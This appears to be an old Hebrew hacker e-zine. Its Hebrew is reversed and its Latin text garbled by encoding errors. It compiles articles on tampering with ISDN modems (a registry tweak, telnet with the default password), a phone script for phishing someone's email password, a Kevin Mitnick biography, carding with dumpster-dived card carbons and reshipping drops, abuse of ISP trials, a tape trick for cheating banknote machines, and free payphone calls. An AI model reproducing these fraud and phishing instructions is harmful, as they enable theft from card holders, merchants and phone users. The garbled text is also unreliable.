םומיסקמ וכלת +9 .הרוחא וא המידק םירפסמ
J:933 -/ J:9:= 7- J:9=N .
...תירוקמ #רדב לבא תילאטוט םדומה תא סורהל םכנוצרב םא - היכרנא
( םדומה תא ספאמ רשא רותפכ םש שי םדומה ירוחאמ Restart םסיק !טומ םע וצחלת וילע רשא )
.'וכו
.)רחא קיבד רמוח לכ וא( פייטולצ םא וקיבדהו םיצחול םתא ותיאש טירפה תא םש ומיש
!ןפרחתהל ליחתי םדומהו ןמז הברה #ישמי סופיאה $ וישכע הרוק המ
.םוקמל למשחה ןוראב גאלפה תא םיריזחמ הלוכ םתא לבא הנטק למשח תקספה היהת
"""""" למשחל רבוחמ םדומה לנה תא םישוע םתאש ןמזבש תואדוול וחכשת לא
.)קולבב והשמ ףורשל !םיעדוי םתא םג לוכי הז יכ !%למומ !בשחמל רבוחמ היהי אלש לבא(
-------------------------------------------------------------------------------------
$קזב לש תיכרוא םדומ
-------------------
.לבגומ אל רשא היפיפיו ןטק םדומ
.תילמרונ תוריהמ םילעמו הדרוהב ייק םישימח האמהמ םידרוי אל הזכ םדומ םע םישנא
$ תיכרוא םדומ לש עצוממ
#est $
0 3:+kb/s X$own )
0 +*9kb/s XMI )
..
.רפשל רשפא הז תא םג לבא
$תובוט יכה םהו ריכמ ינאש תוטיש ינש שי $ םישוע המ
+ .
Go to N#86R/ , Iress on ProIorties .
&hoose $,"7!MP "$"P#R, Iress on ProIorties .
Go to "dVanced, go to ,I P"&/# 3,1 .
change the Value Qro4 "uto4atic to !!!!!! jj M$,MM .
9 %בוק וחתפ . RG $םש בותכו שדח
------------------------------------------------------------------------------------
RG$,#:
+ H/LP76&"7PM"&H,N<3)ste4<&urrent&ontrol3et<3erVices<0'$<M3#&P ,
$eQaultRcV8indowunuJ:9:;
------------------------------------------------------------------------------------
$ היכרנא
$תיכרוא םדומ סורהל םיכרד
.הלב הלבו סופיאל םירותפכ ןיא ונלש דמחנה תיכרואה םדומ לע
םיטוחה תא ופשח !ןיכס םא ותוא וחתפ !למשחל םדומהמ אצוי רשא טוחה תא וחק טושפ זא
!םינפב
םא !הרוק המ רפסמ אל ינא !למשחל בוש ורבחו םינפב ואצמת רשא םיטוחהמ דחא וכתכחת
! תעדל םיצור םתא
""" םוחב %ילממ אל ינאש תורמל !וסנת
------------------------------------------------------------------------------------
.םישוע המ וניבה אלש םירגתואמל םינורחא םירבסה
%בוק םיבתוכש רחאל 0 RG זאו הלב הלב םכתא לאשי אוה ! ותוא םיליעפמ זא ! ותוא םירמוש !
.ןכ םירמוא
רשא םירטמרפ דוע שי ! בוט היהי דימת אל תיכרוא םגו חירסמ היהי דימת אל לטקלא םדומ 00
$תוריהמ םיעבוק
+ .םכלש תיבל היזכרמהמ קחרמה .
9 .בוט רתוי םישדח רתויש לככ ...המ וא םירומג םיקודס םינשי םישדח !ןופלטה לש םיטוחה .
רשא היזכרמב יולת הז !דובעת דימת אל איה םיעוציבה רופיש לש תוטישה בל ומיש וישכע 000
םכלש ריעב
"""" הזמ וחכשת זא השדח איה םא לבא דובעי הז זא תורישל תיסחי הנשי איה םא
$%ילממ ינאו םיפסכ םיבנוג רשא תונוז ינב םה קזב ועדתש קר ! והז
םירבד לע ףסכה תא איצוהל #ידע םיטושפ רתוי םישנאל יכ !רבחתיש דצב ףסכ שיש ימל קר
!םירחא
.)))))))))))$ ינומכ
!ישימח םויב ןכדוע ------------- 99/*9/*+ ------------------------- גניסריפ יע -------------
( תיכרוא םדומל םישועש הלעמל יתבתכש םירכוז restart ושעת לא " למשחהמ האצוה יע טוביר )
.הז תא
תא םיאיצומ ראשכש םימדומה תא תרציימ רשא הרבחב םיימינפ תורוקממ ינזואל ועיגה תועומש
!לבכה
( םדומה לש םיניפב עגופ אוה למשחהמ םדומה לש P,N9 םורגל לוכי םימעפ הברה רחאלו .)
.םדומה לש הפירשל
.למשחהמ ותוא איצוהל ילב ןדומה תא לחתאל הבוט שממ הטיש םכל איבמ הפ ינא ןבומכ זא
הככ םישוע
3tart !j Run !j telnet +*%*%*%+3.
.םדומל םצעב אוהש לנימרט םכל חתפי
תולגל םינש יל חקל( אמסיס וכרטצת לכ םדוק .הז תא ובתכת טוביר רשי תושעל םיצור םתא םא
))חצפל(התוא
Iassword n KKKKKKKK
+ KKKKKKKK] n XIassword הצופנה אמסיסה תא םדומה לע ומש םיקופדה קזב !ןכ ןכ )
( רתויב Iassword %.)
.;
איה אמיססה זא Iassword $םירבד יתש תושעל םילוכי םתא זאו
+ בותכל . H7P !תונשל רשפאש תונוכתה לכ תא לבקלו
.םישוע םתא המ םיעדוי םתא םא קר םש תעגל %ילממ אל ינא לבא
9 בותכל . reset .רדסב היהי לכהו םדומה תא םכליבשב לחאתי אוה .תוכחלו
.קזב לעו תיכרוא םדומה לע םירבד דוע םכל הארהו האנ ףסות הזש הווקמ
#יראתב םעפ בוש תויזכרמה תא הליבגה קזב .ב.נ +;/*9/*+ טאל םישלוג משמ םתא םא זא
!וישכע
.)השוע יתייה ינאש המ הז( םהמ וקתנתת וא םתוא ועבתת םימשא קזב זא
תיכרוא םדומ םעש ימ לכש חוטב טעמכ ינאו לזמ םכל שי זא ןיידע תוריהמ התואב םתא םא
.ליגר ראשנ
" לטקלא יקיזחמ - םכילע םחרמ הז המ ינא
Pirs¡i]ng
;*
.תואמסיס בונגל ידכ היגולוכיספב שומיש
$תויללכ תורהזא(תורעה
יטפשמה דצב ןה האירקה בקע םרגייש קזנ םושל םיארחא אל !ילארשיה םירקאהה ןוגרא !ונא
"דבלב ארוקה לע תלטומ תוירחאה לכ !יזיפה דצב ןהו
"והשלכ קזנ םורגל תנמ לע אלו ףסונ עדיי שמתשמל ריבעהל תנמ לע בתכנ הז טסקט
.םירבד ינימ לכל השיג גישהל ידכב תואמסיס ינימ לכ תבינגל תוטיש ןומה םויכ שי
םדוק עדי לכ םיכירצ אל .תואמסיסה יגוס לכ תגשהל תדבועש הדיחא הטיש םכל הארא ינא
.םיבשחמב
.'וכו ראוד !ןופלט !ליימיא ןוגכ רושקית יעצמא הז םיכירצ ןכש המ
.אמגוד ןתא ינא .דבוע הז #יא
...תלהנתמ החישה .הנוע ןמלדפ רמ .לצלצמ ןמלדפ תחפשמ לש תיבב ןופלטה
.ולה $ןמלדפ רמ
.בהז טנרטניאמ ןתמ רבדמ !םולש $םתא
.ןוכנ !ילש טנרטניאל םיארחאש הלא םתא !הא $ןמלדפ רמ
.םויה #לש ליימיאל תשגל תיסינ הרקמב םאה .רשקתמ ינא ןכל .דואמ ןוכנ $םתא
.המל ...םויה קוסע דואמ יתייה !אל $ןמלדפ רמ
.וקחמנ תונובשחה לכו סרק אוה .ראודה תרש םע תויעב ונל ויה .ינא םג !ןכ !ממה $םתא
.ילש ליימיאה תא בוש קודבל לכוא ינאש דע חקיי ןמז המכ זא .רמוא התא המ ...יאוו $ןמלדפ רמ
ותסנכהו שדחמ עדימה ףוסיא לע יארחא ינא .תובורקה תוקדב ןקותי לכהש הווקמ ינא $םתא
.בשחמל הרזח
.#לש שמתשמה םש היה המ רכוזה תא הרקמב םאה
.שמתשמ םש $ןמלדפ רמ
.#לש ליימיאה תבותכב ? ה ןמיס ינפל אבש קלחה הז .ןכ $םתא
אוה ילש שמתשמה םש זא #כ םא .יתנבה .הא $ןמלדפ רמ Qedel4an .
.הז עגרב הז תא ףיסוא ינא .ןייוצמ !יפוי $םתא
.הדות !יקוא $ןמלדפ רמ
.#לש אמסיסה היהתש הצרת המ $םתא
.הנשיב שמתשהל םג לוכי ינאש וא !השדח אמסיס רוחבל בייח ינא $ןמלדפ רמ
.הנשיב שמתשהל טושפ לוכי התא .#ל חונש #יא $םתא
הז .רוכזל יל לק הנשיה .הבבס $ןמלדפ רמ Owert .
...עגר קר $םתא
.םייתש וא הקד דועב #לש ליימיאה תא קודבל לכות .וישכע ןיקת לכה .יקוא
;+
.הבר הדות $ןמלדפ רמ
.םיענ םוי #ל היהיש !המ דעב ןיא $םתא
.#ל םג .הדות $ןמלדפ רמ
-החיש ףוס-
.קלח םכל #לוהש דע !םירבח םע ונמאתת ...מממממה
.רקאהה תחא םעפו !וילע םידבועש הז תחא םעפ .רחא קלח קחשיי רבח לכש
!תובשחמל םיחותפ תויהל !ןוימידב שמתשהל םכילע .םעפ לכ ופלחתת הככ
.םתאש םינעוט םתאשימ לש בצמב םכימצע תא םישלו
.ונהית .ןמאתהלו ןמאתהל !ןמאתהל !ןמאתהל םכילע םיקלקלח תויהל ידכ
By waMaw
;9
.יל ואיפ ריסאה י$ע ורפוסש םלועב םסרופמה רקאהה לש היפרגויבהמ םיעק
.ומצע לע ןגהל ול ונתנ אל !האדוהה ינפלש םינשה םתוא לכ
פאל וליפא !םיבשחמ םוש .תרושקת יעצמא םוש !תורוסא ' תושיגפ !הרוסא ' היירפסל השיגה
תואיצי אלל !םדומ אלל( ןכסמ פוט P&M&," םירהוסל הארנ )םיינוציח םיטרופ אלל וליפא !
.םסרופמה רקאהה לש וידיב ידמ ןכוסמ עוצעצכ
ונממ חקלנ היה בשחמה תאז ירחא !םימי המכ לש שומישל !בשחמ וידיל לבקמ היה אוה םימעפל
.תדחוימ הדעוו לש תקדקודמ הקידב ירחא דמשומ היהו
רתוי #שמב אלכב בשי אוה = םלועב םסרופמ יכה ול תודות !סל'גנא-סול לש רהוסה תיב .םינש
.הלוכ הנידמב רומש יכה ןכ ומכ .ילאוטריווה
.ותופח תא חיכוהל הסינ !דגנתה אוה ןמזה ותוא לכ #שמב
היירפסה ירפסב לעלעל !םכתיבל סנכיהל יתלוכי !הטושפ תיתודלי תונרקס היה יתוא עינהש המ
.רבד יתחקל אל םלועמ ינא לבא 9םכלש ררקמה תא חותפל !םכלש
רבמטפסב +;;. 9ןוציחה םלועהמ םינש םייתאמ לש דידיב שרד עבותה !םושיא בתכ ודגנ שגוה
לבקי בוט יכה הרקמב !הינרופילקב חצור 3 חטב אוה !חצור היה קינטימ ןיווק וליא .רסאמ תונש
.דחא ףא חצר אל אוה !לבא .ןמז תוחפב ררחתשמ היה
ב : !לירפאב +;;; רפסמ סל'גנא-סול לש רוגסה אלכב תיב ריסא ! .;;=*!*+9 קינטימ דיוד ןיווק
ב דלונ( J%.%+;J3 .תויושרה םע ןועיט תקסעל עיגהו המשאב הדוה )
שממ התא !ןורגה לע ןיכס #ל שי רשאכ .הכושח הטמסב !הלילב #תוא ודדש םעפ יא םאה 9
בשוי התא !דבוע הז #יא עדוי התא .םישורג קר שי #ל שי םיסיכבש רעטצמ 3 תמ !דבל !תועובש
קוחה ירמוש לש םירפס גוזו הכר הכירכב טמוקמ #נת #ל םיאיבמ תאז ירחא .םומעשמ
ללגבו הנקז אתבסמ קנראה תא בנג ארח הזיא #יא לע םירופיס תורשע !םהמ דחא לכב !םיאונשה
ו תופורת המצעל תונקל הלכי אל איה הז ;++ אל רבכ התאש ןיבמ התא .והזו .הל רוזעל ולכי אל
לוכי !םטמוטמ ןואג ירה אוה !הז תא הנק ונלש רבחהש ןימאמ שממ אל ינא !לבא .הזמ תאצל לוכי
9והשמ לע בשחש תויהל
רודכ לש םירקאהה #למ לש תוינושארה תויקוח אלה תולועפה לש היגולונורכ םכינפל הנה
$%ראה
( גניקירפ .םיעבשה תונש Ihreaking ולש יתיבה ןופלטה תכיפה !ןופלטב רושקה עשפכ רתוי עודי !)
שקבמה רבג לש דורצ לוק םיעמוש וק לש לילצ םוקמב !תרפופשה תמרהב !ירוביצ ןופלט ןיאמל
סינכהל 9* .טנס
+;.* םיצבקב אלו םינויצה רגאמב אל עגנ אל !ולש רפסה תיב לגס לש םיבשחמה תשרל הצירפ '
.דבלב וחוכ תא הסינ ןיווק !להנמה לש םיישיאה
+;.+ .ודרולוק תנידמ !ותנידמב ריוואה ליח תכרעמ לש םיבשחמה תשרל תחלצומ הצירפ '
.תויושרהמ הפיזנ לביק
+;.9 תרבח לש ןיינבל רודחל וחילצה ירבח ינש דועו ויווק !םיבשחמ לש ןבומב הצירפ שממ אל '
PaciQic Bell לש הכרדה ירפס בונגלו &63M63y) לשו MicroPorty) .
' ןושארה רצעמה 3 .יאנת לע הנש - םיריעצ םיניירבעב לופיטה זכרמב !סל'גנא-סולב םישדוח
;3
לש רצעמ !רורחשה ירחא םייעובש J #רוצל הטיסרבינואה בשחמב יקוח אל שומיש לע םישדוח
ה תשרל השיג "RPH"Net .ןוגטנפה לש
ה תאזה הנש יצחש "RPH"Net םיחמומה דחאל ןיווקו !דבלב #וניח יכרוצל תשרל הכפה
.םיבשחמ תותשר אשונבו םיירלוסה םינופלטה אשונב רתויב םיבוטה
סגנ אוה !שורבכע ול וארק זא !היירפסהמ םירפס וליבשב יתבחס ינאו .יקוא !ןודלי היה אוה 9
םינבלה םידליהש #יא .רודנוק ול וארקש בהא ומצע אוה .הבר תוריהיב ןטשה יעדמ עלסב
9םייעונלוק םייוניכ םיבהוא הלאה
#שמב = םייח להינ אוה !%וח יפלכ !קוחה םע םיכוסכסמ ענמיהל חילצה ןיווק תואבה םינשה
( םינולאה #לא ' הנטק תינרופילק ריעב םיטקש םייתחפשמ #housand 6aks הילידיאה ףוס .)
תנשב דלומה גחל #ומסב הרק +;.N .
+;.. ' 3 תרבחמ תונכות תבינג לע !יאנת לע םינש 3anta &ru( 6Ieration ןיווק הנשה ףוסב !
לש רקחמה תדבעממ יטרפ רוקמ דוק תבינגב םשאומ אוה .םיגרוסה ירוחאמ בוש
$igital OuiI4ent &orIoration לש תיקוח אל הסרג התייה הרטמה !הטלא ולאפב תאצמנש
הלעפהה תכרעמ 0M3 .רצעמ תנשב ןיווקל הלע הז רבד .
לש םיבשחמל תורכמתהמ יופיר לש סרוקל חלשנ ןיווק הזמ %וח J .םישדוח
.םדומ םע בשחמל ברקתהל אל םלועל $רורחשה יאנת
$אלפ #רואבכ םירוק םירבדה .קחשמה יללכ ירחא אלמל לדתשמ !ברקתמ אל קינטימ זא
טפשמה תיב לש עדימה ירגאממ !םלענ טפושה לש קנבה ןובשח !קתונמ ןחבמ ןיצקה לש ןופלטה
.ןיווק לש וטפשמו ורצעמ לע עדימה םלענ זורק הטנסב
תנשבש #כ לע םירבדמ +;;* םע שגפיהל ידכב עיגה אוה םשל !לארשיב ןיווק תא ואר וליפא
.לוחל תאצל רוסיאה תורמל !םירקאהה וירבח
וילא בורקה םדאה !ויחא תומ !םואתפ זאו !ילמרונ ביתנל םיסנכנ קינטימ לש וייח !תואבה םינשב
.רתויב
םחלהל ןויסינ הזש םירמואה שי !תונוש תורוצב םיריבסמ קינטימ לש תואבה תולועפה תא
.רצק ןמז קרפב ףסכ רתויש המכ גישהל ןוצרה הזש םינעוטה שיו ןואכידב
השקבה !בהרא לש הרובחתה דרשממ םיידוס םיכמסמ תלבקל השקבב דושח אוה הזה ןמזב
.הנידמה תרטשממ החלשנ איהש ןוויכ התנענ
הו ןוגטנפה תותשרל הצירפב דושח אוה ןכ ומכ -B, תנש התואב +;;9 .
תרבח לש החטבאה תקלחמל תותיצב המשאה תא וילע ולתל םיסנמ PaciQic Bell .
ה -B, .םינש רפסמל םלענ קינטימו חקלתמ בצמה !ןיווק לש ותיבב שופיח #רוע
םינשה ןיב +;;9 ' +;;: תאזה הפוקתב .לירמ ןייארב םשה תחת לטאיסב טקשב יח אוה
תורבחה לש תירלולס תרושקת לש הרקבה תוכרעמ תבינגל יארחא אוהש םידשוח Motorola,
Nokia ו Mc&aw &ellular &o44unication ,nc תרבח לש החטבאה תכרעמ לש הצירפ ! .
3un Micros)ste4s תותשרה תחטבא תכרעמ לש הצרהה תסרג תבינג םגו ! 3"#"N .
םירפס !םיירלולס םינופלט רפסמ התכחב תולעל החילצה הרטשמה !ספתנ טעמכ אוה זא
.הרטשמה לש רדתל הנזאהל רישכמו תרושקתו תותשר !םיבשחמ לש םיאשונב
דלומה גח +;;: םיחמומה דחא םע רבכע-לותח קחשמ םלועל איבהל ןיווק טילחה גח תנתמכ '
.הרומומיש ומוטיצ ' החטבא תוכרעמב םלועב רתויב םילודגה
לופיל לכי דחא לכ השעמל !תדוכלמ ול ןיכה םג אלא ןיווק םע קחשמל ןכומ היהש קר אל ומוטיצ
.ןיווק תא סופתל הרטמ ןאכ התייה אל !הזה חפב
$#כ הארנ לכה %וחבמ
ןמ קתנל חכשו הדבנל השפוחל עסנ הרומומיש ומוטיצ !םיבשחמ תחטבאל ימואלניבה החמומה
.רחא בשחמב גולב דעות בשחמב הרקש רבד לכש #כב התייה תדוכלמה .ןגומה ובשחמ תא תשרה
.העדוה #כ לע לביק דימ ומוטיצ !%רפנ בשחמה רשאכ
.לודג והשמ והשימ יע ספתנ ןויתיפה !הצירפה לש תויחמומה יפל
;:
!החטבא תונכותו םיצבק ובשחממ ובנגנ קר אלש ירחא #א !םוקנל ןווכתה אל ומוטיצ םדוק םא
.תובילעמ תוילוק תועדוה וראשוה םג
ל הרזע תשקבב הנפ אוה !קינטימ לש ותסיפתל לועפל ליחתה ומוטיצ -B, תולגל חילצה ףוסבלו
לש סוידרב קינטימ לש ומוקימ תא 9 .מק
ב += ראורבפב +;;= העשב *+%3* .ספתנ ןיווק
ב 9+%*+%9*** תואצרה ריבעהלו בשחמב שמתשהל ול רוסא ןיידע לבא !ףוסבל ררחוש ןיווק
ה דע םיבשחמל הרושקה הרשמ לכב דובעלו םיבשחמ אשונב 9*%*9%9**3 ישפוח היהי רשאכ !
.יפוס ןפואב
תולועפל הקיז ןתנ וליפא !םירקאהה תולועפ תא קיספהל ןויסינב הברה ליעוה אל ןיווק לש ורצעמ
' ןיווקל שפוח אמסיסה תחת םינוש םירתאל וצרפ םירקאה ןומה ורצעמ #שמב יכ ולא -R
/0,N .
By Boris
;=
כ םניח #ס
ןאכ !4an .
לע בותכא ינא םויה &arding .
&arding .טנרטניאב םהלש-אל יארשא יסיטרכב םינוק םישנא אבש הטישל אצמוהש חנומ אוה
.ונינבש םיליחתמל %למומ אלו ןכוסמ דואמ רבד והז
ה #ילהת לע בותכא ינא carding )רמהו בוטה( ףוסה דע !הלחתההמ
.ליחתנ ואוב זא
...יארשא גישי ינא לזאזעל הפיאמ !ילאוש חטב םתא !לכ םדוק
$הבושתה הנה זא
.תצלמומ יכה אל דע רתויב תצלמומהמ ליחתי ינא !ןהילע עדוי ינאש תוטיש שולש שי
+ .יארשא בויחל %הגמב תושמתשמ ןיידעש הלאה תוינעה תויונחה תא םיריכמ םתא )
םינשי םידגב םע אובל חוכשל אל( תונחה ירוחאמש חפל הלילב וכל "םכלש תורטמה ןה ולא
) יתנשה לויט לש קיתו סנפ!םירוחשו
אל !תוריינמ %וח .םייחב םתיארש הייקנ יכה הפשאל םתצפק עגרכש ולגת םתא "המינפ וצפק
עבצב הלאכ םינטק תוריינ שפחל וליחתתו םכלש סנפה תא וליעפת !הרקמ לכב .םולכ םש היהי
.רופא
לש הליבח הזיא םיאצמנ םה ללכ #רדב +** יסיטרכ עגרכ ונל שי "יפוי .םתאצמ .לבז תיקש לכב
"וזוזת לא !רמושב םילקתנ םתא םכלש שופיחה עצמאבש הרקמב .)םש ויה המכ יולת( "יארשא
ללכ #רדב הז !םידיחפמ תולוק תושעל וליחתת !ואצת לא !תאצל םכל רמואו !םתוא עמש אוה םא
םיעדוי אל טושפ םירמוש יכ -םכומכ קוידב דחפמ אוה !דבל אוהו #ושח הליל !םיעדוי םתא( דבוע
רמואו םש דמוע ןיידע אוה םא .) )דחוש(םירלוד המכ ול ופחדת וא ! םהלש םייחהמ םיצור םה המ
וחרבת םתאש ומכ - "םשמ וחרבת !רוונתסמ אוה דועבו !םכלש סנפה תא וילע ונווכת !תאצל םכל
תיבהמ ואצת לא .התיבה םתעגה .)התוא וחק !תיקשה תא תחקל םילוכי םתא םא קר( לבחממ
.) )$ רעטצמ )$ רתומ רפס תיבל( םייעובש תוחפל
9 ןווכתמ ינא !תונולח רובשלו אובל שממ אל ...וצרפת ) hacking .עדויש ימל קר הז לבא .
3 םתא .ןוכנ םיטרס תרכשהל תונוכמה תא םיריכמ םתא .תצלמומ אל תוחפ יכה הטישה תאז )
.ןכ וישכע .יארשאה סיטרכ רפסמ בותכ הילעש תינובשח תאצוי םג טרסה אצויש ירחאש םיעדוי
!טרס ריכשמו אב רחא והשימשכו !טרס רוחבל םיצור םתא וליאכ הנוכמה דיל ודמעת !הרקמ לכב
"םשמ וחרבתו תינובשחה תא וחק
)#שמהב םהמ דיגי ינא( ימואל ןיב יארשא סיטרכ שי טרס ריכשהל אבש דחא ותואל םא קר 000
.תאזה הטישה תא םישוע זא
"ןוימה תא ליחתהל רשפא )םימלש קר ..בוט( םימלשו םיאירב התיבה םתעגהש החנהב !יקוא
!הככ וניימת
$ב םיליחתמש יארשא יסיטרכ :* - :; ! =+ - =9 ! J* ו 3N לש הרדסהמ עדוי ינאש המ לכ הז( 3 )
ןימי דצב
.לאמש דצ !םירחאה לכ
$הככ הז וישכע ונל שיש המ
"""שומישל םינכומ יארשא יסיטרכ !ןימי דצ
.ףורשל #ירצש לבז לש המרע !לאמש דצ
$םיאבה םירבדה תא ושעת תונקל םיצור םתאש םיטילחמ םתאשכ
+ .)םלשומ הז היירפסו רפס תיב( םכלש תיבב אל אוהו טנרטניאל השיג ול שיש בשחמ וגישת )
;J
9 .הזה בשחמה לע הדובעל רושיא הבוח )
3 .הטקש טולימ #רד )
"ונקתו !תונקל םיצור םתא ובש רתאל וסנכ !םכלש המישרהמ דחא יארשא סיטרכ םכתא ואיבת
םגש הצור רתאהש הרקמב .)"""התיבה רבד םוש חולשל אל "םולשתב הדרוהל תונכות קר לבא(
$םיגוסה הנה !רפסמהמ %וח םימלשמ םתא יארשא סיטרכ גוס הזיאב ורחבת
:* - :; הזיו $
=+ - =9 דראכרטסאמ $
J* ירבקסיד $
3N סרפסקא ןקירמא $
םיכירצ םתא !רחא רופיס רבכ הז !התיבה חולשל #ירצש םירבד תונקל םיצור םתא םא $roIs .
$roIs םכילא הז תא םיחלוש םהו םתינקש המ תא םיחלוש םתא םהילאש םלועב םישנא םה
.הליבחל הרק המ תעדוי אל הרטשמה הככ !התיבה
םע רשק רוציל םיכירצ םתא לכ םדוק droI ב שפחל %ילממ ינא ! ,R& .
תוחפל םתאצמש ירחא 9 םכל שיש ודיגת לא( םהל ודיגת !םיפורד 9 ודיגת פורד לכל !םיפורד
םכל שי .תבותכ ושקבתו הלבהלב פורד םיכירצ םתאש )דיחיה פורדה אוהש 9 "בינגמ .תובותכ
הז תא חולשל #ירצ אוהו םיבורקה םימיב הליבח לבקל #לוה אוהש םיפורדה רחאל ודיגת וישכע
פורדל "ינשה פורדה לש תבותכה תא הלא !תיבה לש תבותכה תא ול ונתת לא לבא !התיבה םכילא
.תיתימאה תבותכה תא ול ונתו התיבה הז תא םכל חולשל ודיגת )ילארשי היהיש בוט יכה( ינשה
תא תחקלו תישיא ותיא שגפהל תכלל םג רשפא !ילארשי אוה פורדהו םיצור שממ םתא םא
.הז לע %ילממ ינא !הליבחה
ייושב הנתמ( והשמ פורד לכל חולשל וחכשת לא 9* אלו יארשא סיטרכהמ ןבומכ !קיפסת רלוד
.) )$ םכלש ףסכהמ
"םירבחל רפסלו הזמ בהלתהל וליחתת לא !הליבחה תא םתלביקש ירחא
.תדלוהה םויל הז תא םתלביקש ודיגת זא קרו !םכלש תדלוהה םוי דע דוסב הליבחה תא ורמשת
.ושדחתת
By E-man ¡I.C.F &
;N
דוע םיפורד ילב * םניח #סכ 'היש
+ .לכו וב ובשייתה אל ןיידעש וא שוטנ תיבל הליבחה תא וחלש םיפורד שפחל חוכ םכל ןיא םא .
9 $רמואש בתכמ וניכה .
1111111111111111111111111111111111111111111111111111111111
הנמזהב םכמצעל םתארקש םשה רמ ינא םולש 4 4
רפסמ .ז.ת 'סמ 4 4
יארשא סיטרכ 'סמ 4 4
תיבב אצמנ אל ינא רשאכ תלדה דיל הליבחה תא ריאשהל שקבמ 4 4
4
הבר הדות 4
ולש םשה רמ 4
המיתח 4
11111111111111111111111111111111111111111111111111111111114
)... הנשמ הז המ ( לאמשמש םיספה תא םילשהל חוכ יל היה אל לבא החילס0
.... םכילע לבח אל םא יכ . יתימאו יטנטוא הארי לכהש
3 ב אובת םוי לכ . N התוא וחק הליבחה תא םיאור םתא םאו תיבה תא קודבל םירהצה רחא
. רהמ רתויש המכ ... וחרבתו
By Old-Hacker ¡I.C.F &
;.
תאמ +םלוכמ לוז רתוי נרניא לבקל ךיא E-man
: םיגשומ
,3P . טנרטניא קפס &
---------------------------
...לארשיב טנרטניאב שומישה רקי המכ םעדוי חטב םתא
+;x ..שדוחל
+המ לע (יתוחא
$םכליבשב הז !ינומכ םיבשוח םתא םא
תחקל לוכיו דבלב םיצימאל אוה הזה #ילהתה 3 רתוי וא םישדוח
.םלתשמ הז ףוסב לבא
$תוארוהה הנה
+ הזיאל ומשריה ) ,3P לש ןויסינ תפוקתל םיצור םתאש 3 .םישדוח
9 . עובש לכ !רשפא קרש המ לכ לע וננולתה !וז ןויסינ תפוקתב )
3 -ה ורבעש ירחא ) 3 ה !הלאה םיכרפמה םישדוח ,3P וצרת םא םכתא ולאשי םתמשרנ וילאש
ןויסינה תפוקת תא #ישמהל
יכ םיצור אל םתאש ודיגת ,3P םכל עיצה )#שמהב וילע ריבסנו שארמ וניכת ותואש( הרחתמ
.רתוי בוט ריחמ
: ב םייתניב ) ,3P המ רובעל םכל יאדכ םא ולאשת !הרחתמה ,3P ל וילא םתמשרנש םדוקה ,3P
ה יכ םיחוטב אל םתאש ודיגת "חטב "ןכ ולבקתש ןבומכ !הזה ,3P ולאשי םה !בוט רתוי םדוקה
ייב ודיגיו םשו ןופלט רפסמל
המ ןופלט ולבקת תרחמל ,3P המ הבוט רתוי העצה םע הרחתמה ,3P "םדוקה
ל הז תא ודיגת ,3P )"הווש הז םג לבא ישדוח ישפוח אל ןבומכ( "םניח טנרטניא ולבקתו םדוקה
$הככ הז םכל אצויש המ
,3P ישדוח ישפוח םע דואמ לזומ דחא
,3P ישדוח ישפוח ילב םניח רחא
"ידי לע קודב הז רמאמב בותכש המ לכ
By E-man ¡I.C.F]
;;
#סכ תורופש תונוכמ לע דובעל ךיא * ...םניח ןמוזמ
)"לוחכ שאר אי סקס אל( םיכירצו םיבהוא ונלוכש רבדב קוסעי הזה רמאמה
.ףסכ בהוא אל ימ !===ףסכ=== לע רבדמ ינא
.ףסכ #ירצ אל ימ
.ףסכב שמתשמ אל ימ
.אבה רמאמל רובעת !ינא הלאה תולאשהמ תחא לע תינע םא
$ינויערה קלחל רובענ ואוב !הרקמ לכב
.ןוכנ ףסכ תטירפל הלאה תונוכמה תא םיריכמ ונלוכ
...םינפב שי ףסכ המכ ובשחת קר
$תדבוע תאזכ הנוכמ #יא הארנ אוב
לש רטש סינכמ התאשכ 9* !) )$ .םתחכש םינרפת ונחנא( לקש
"ומצע רטשה #ותב םיאצמנש םינממס אוצמל ידכ ותוא תקרוס הנוכמה
בותכת םאש תרמוא תאז =* $( .שאר באכ היהי לבקתש המ לכ הנוכמל ותוא סינכתו ריינ לע לקש
!הנוכמה לע דובעל אל אוה םיצור ונחנאש המ
"רטשה תא ונתאמ תחקל הנוכמל רשפאל אל הלא
"רטשה תא תועלוב ןה זא קר !ותוא וטרפו רטשה תא וארקש 0ירחא0 !הלאכ תונוכמ
.ונלש לכמ רקיה רטשה תא ונל תחקל הנוכמל תתל םיצור אל ונחנאש תרמוא תאז
.הז תא םישוע #יא
$ישעמה קלחל ונעגה וישכע
+ יוצר( יוצרה םוכסה לש רטש שארמ #ל ןכה ) 9* םע בבותסהל הצור ימ יכ לקש =* וא +**
).קנראב םילקש
9 )דחוימב הבע פייטולס( פייטנקסמב ותוא ףוטעו רטשה לש עצמאה תדוקנ תא אצמ )
$תרמוא תאז
$רטשה הארנ הככ םא
עצמא
4----------------------------------4
4 9* 4
4 4
4 4
4 רטש 4
4 4
4 4
4 9* 4
4----------------------------------4

$ונלש הקבדהה ירחא רטשה הארי הככ זא
עצמא
4-----------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 9* 4
4 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
4 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
4 רטש &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
4 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
4 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
4 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+**
4-----------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
פייטנקסמ 7 & & $ ארקמ
3 )"""רטשה תא ובזעת לא( ףסכה תא םיטרופו הנוכמל פייטנקסמל רבוחמה רטשה תא םיסינכמ )
: )ןוכנ הז תא םתישע םא ערקי אל אוה( קזח רטשה תא םיקיזחמ )
= פייטנקסמה תא םיאיצומ תיבבו רטשה תא תבזוע הנוכמהש דע םיכחמ )
)$ תועבטמב הרזח ולש םוכסה תא םתלביק ןיידע !ערקנ רטשה םא וליפאש הזה רבדב יפויה לכ
.) הזב םירבד תונקל דועו ... הרזח ותוא קיבדהל רשפאו(
E-man ¡I.C.F]
+*+
ירוביצ ןופלב םולשת אלל רוביד
...ריהזמ דיתע ול הפוצ ינא * יקלימ לש הנושארה הבתכה יהוז
"" ףסכ הלוע הז יכ ילש ןופאלפהמ החיש איצוהל הצור אל ינאו " ילש רבחל רשקתהל הצור ינא
" םניח הזש רקיעה " הנשמ אל הז " שדוחה ידימ רתוי יתרביד ינאש וא " ןמקוט הברה יל ןיאו
:םיכרצמ
